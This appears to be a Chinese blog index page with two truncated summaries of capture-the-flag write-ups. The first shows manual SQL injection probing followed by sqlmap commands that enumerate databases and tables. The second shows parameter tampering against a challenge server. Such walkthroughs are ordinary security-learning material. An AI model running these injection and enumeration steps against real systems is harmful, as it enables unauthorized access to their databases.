摘要：打开地址，输入1正常显示，输入1’报错，输入1#显示，说明此处存在SQL注入，抓包后用sqlmap进行爆破 python2 sqlmap.py -r a.txt --dbs python2 sqlmap.py -r a.txt -D skctf_flag --tables python2 sqlma 阅读全文

摘要：打开页面最下面出现一行：Parameter NOHO:The Number Of Higher Organisms说明有个NOHO参数 http://62.234.99.204:8007/?NOHO=1提示too small!! http://62.234.99.204:8007/?NOHO=999 阅读全文